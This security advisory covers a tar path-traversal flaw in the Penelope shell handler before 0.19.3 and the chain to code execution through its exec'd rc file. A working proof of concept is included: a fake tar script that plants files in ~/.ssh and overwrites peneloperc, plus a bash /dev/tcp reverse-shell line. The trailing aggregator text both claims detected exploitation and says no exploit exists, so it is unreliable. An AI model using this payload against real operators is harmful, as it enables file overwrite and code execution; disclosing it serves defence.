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GHSA-f42x-p2mx-hm8r
No affected components available
Summary
Penelope versions prior to 0.19.3 extracted tar archives received from remote sessions without validating archive member paths. When using the affected Unix download path, a malicious or compromised remote session could return a crafted tar archive containing path traversal entries, such as ../, causing files to be written outside the intended download directory on the Penelope operator's machine.
The impact is limited to files writable by the user running Penelope. In some cases, this arbitrary file write could be chained to operator-side code execution if the attacker can overwrite a file that Penelope or the user later executes, such as ~/.penelope/peneloperc. The issue has been fixed in version 0.19.3 by rejecting unsafe archive paths during extraction.
Affected conditions
The issue requires the operator to use the Main Menu download command to download files from a malicious or compromised remote session that can influence the tar archive returned to Penelope. The Python agent download path is not affected in the same way because it does not rely on the remote tar command.
The vulnerable behavior is related to Python's historical tarfile extraction defaults. In Python versions before 3.14, TarFile.extractall() did not use the safer data extraction filter by default, so applications extracting untrusted tar archives needed to explicitly provide a safe extraction filter or perform their own path validation.
Python 3.14 changes the default extraction behavior to use the data filter, which rejects dangerous archive features such as absolute paths and paths outside the destination directory. Penelope 0.19.3 now performs explicit validation/rejection of unsafe archive paths so the fix does not depend on the Python runtime version.
Details
The vulnerable code is in the Unix download() implementation.
Penelope creates a local download directory:
local_download_folder = self.directory / "downloads"
Later, it opens a tar archive received from the remote session:
tar = tarfile.open(mode=mode, fileobj=tar_source)
Then it extracts all members without validating archive paths:
tar.extractall(local_download_folder)
Because member names are trusted, a malicious tar archive can contain paths such as:
../../../../../home/operator/.penelope/peneloperc
This escapes the intended local_download_folder and writes to an arbitrary path writable by the Penelope operator.
The same extraction block also suppresses Python's DeprecationWarning around unsafe tar extraction:
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=DeprecationWarning)
tar.extractall(local_download_folder)
The file-write impact can be chained with Penelope's rc loading behavior:
def load_rc():
RC = Path(options.basedir / "peneloperc")
try:
with open(RC, "r") as rc:
exec(rc.read(), globals())
By default, options.basedir is ~/.penelope, so the executed rc file is:
~/.penelope/peneloperc
Since session downloads are stored under ~/.penelope/sessions/<session>/downloads, a crafted tar member can traverse upward and plant or replace ~/.penelope/peneloperc. The planted Python code executes when Penelope starts again or when the operator runs reload.
PoC
The following reproduces the issue locally by simulating a malicious remote endpoint. The fake tar binary is placed first in PATH for the test shell, so when Penelope asks the remote session to run tar, the remote session returns a crafted archive with path traversal entries.
Start Penelope in Terminal 1:
penelope -p 4444 -U -C #No upgrade and session connection needed
<img width="1920" height="337" alt="path1" src="https://github.com/user-attachments/assets/c8cb2dd6-e6d5-43ce-b3a2-61005dbcf95c" />
Prepare the fake remote tar in Terminal 2:
mkdir -p /tmp/penelope-fakebin
mkdir -p "$HOME/.penelope" "$HOME/.ssh"
cp -f "$HOME/.penelope/peneloperc" /tmp/peneloperc.backup 2>/dev/null || true
cat > /tmp/penelope-fakebin/tar <<'EOF'
#!/usr/bin/env python3
import io
import os
import sys
import tarfile
import time
home = os.path.expanduser("~")
target_home = home.lstrip("/")
def add_file(tar, target, data):
data = data.encode()
info = tarfile.TarInfo(target)
info.size = len(data)
info.mode = 0o644
info.mtime = int(time.time())
tar.addfile(info, io.BytesIO(data))
with tarfile.open(mode="w:gz", fileobj=sys.stdout.buffer) as tar:
add_file(tar, "../../../../../" + target_home + "/PENELOPE_CVE_PROOF.txt", "Penelope path traversal proof\n")
add_file(tar, "../../../../../" + target_home + "/.ssh/PENELOPE_SSH_KEY.txt", "fake-demo-ssh_key-not-for-authentication\n")
add_file(
tar,
"../../../../../" + target_home + "/.penelope/peneloperc",
"open('/" + target_home + "/PENELOPE_RC_EXECUTED.txt', 'w').write('peneloperc executed via reload\\n')\n"
)
EOF
chmod +x /tmp/penelope-fakebin/tar
touch /tmp/penelope_dummy
Connect the local test shell back to Penelope in Terminal 2:
PATH=/tmp/penelope-fakebin:$PATH bash -c 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'
<img width="1920" height="1000" alt="path2" src="https://github.com/user-attachments/assets/c6db4888-9a41-4a99-b8d1-35c06f07ca4a" />
In Terminal 1, inside Penelope, trigger the vulnerable download:
download /tmp/penelope_dummy
Verify in Terminal 3 that files were written outside the intended download directory:
cat "$HOME/PENELOPE_CVE_PROOF.txt"
cat "$HOME/.ssh/PENELOPE_SSH_KEY.txt"
grep PENELOPE_RC_EXECUTED "$HOME/.penelope/peneloperc"
<img width="1920" height="573" alt="path3" src="https://github.com/user-attachments/assets/9c7c8d3b-00ee-4d74-b195-1e91ff581243" />
Expected output includes:
Penelope path traversal proof
fake-demo-ssh_key-not-for-authentication
open('/home/<user>/PENELOPE_RC_EXECUTED.txt', 'w').write('peneloperc executed via reload\n')
In Terminal 1, inside Penelope, execute the planted rc line:
reload
Verify in Terminal 3 that peneloperc executed:
cat "$HOME/PENELOPE_RC_EXECUTED.txt"
Expected output:
peneloperc executed via reload
Cleanup:
rm -f "$HOME/PENELOPE_CVE_PROOF.txt"
rm -f "$HOME/.ssh/PENELOPE_SSH_KEY.txt"
rm -f "$HOME/PENELOPE_RC_EXECUTED.txt"
if [ -f /tmp/peneloperc.backup ]; then cp -f /tmp/peneloperc.backup "$HOME/.penelope/peneloperc"; else rm -f "$HOME/.penelope/peneloperc"; fi
rm -f /tmp/peneloperc.backup
rm -rf /tmp/penelope-fakebin
rm -f /tmp/penelope_dummy
Impact
A malicious remote session can write arbitrary files on the Penelope operator's machine, limited to the permissions of the user running Penelope.
For a non-root operator, this may be chained to operator-side code execution only if the attacker can overwrite a user-writable file that Penelope or the user later executes, such as:
~/.penelope/peneloperc
~/.bashrc
~/.profile
~/.config/autostart/*.desktop
For a root operator, the impact is higher because root-writable files may be overwritten.
Suggested Fix
Validate every archive member before extraction by resolving the final destination path and rejecting paths outside the intended download directory. Reject symlink and hardlink members. On supported Python versions, filter="data" can be used as an additional safeguard.
The vulnerability can be exploited over the network without needing physical access. It is difficult for an attacker to exploit this vulnerability and may require special conditions. An attacker does not need any special privileges or access rights. The attacker needs the user to perform some action, like clicking a link. The impact is confined to the system where the vulnerability exists. There is a high impact on the integrity of the data. There is a low impact on the availability of the system.
Exploitation attempts have been detected. Elevated vigilance and prompt remediation are advised.
The exploit probability is very low. The vulnerability is unlikely to be exploited in the next 30 days.
We did not find any exploit available. Neither in GitHub repositories nor in the Exploit-Database.
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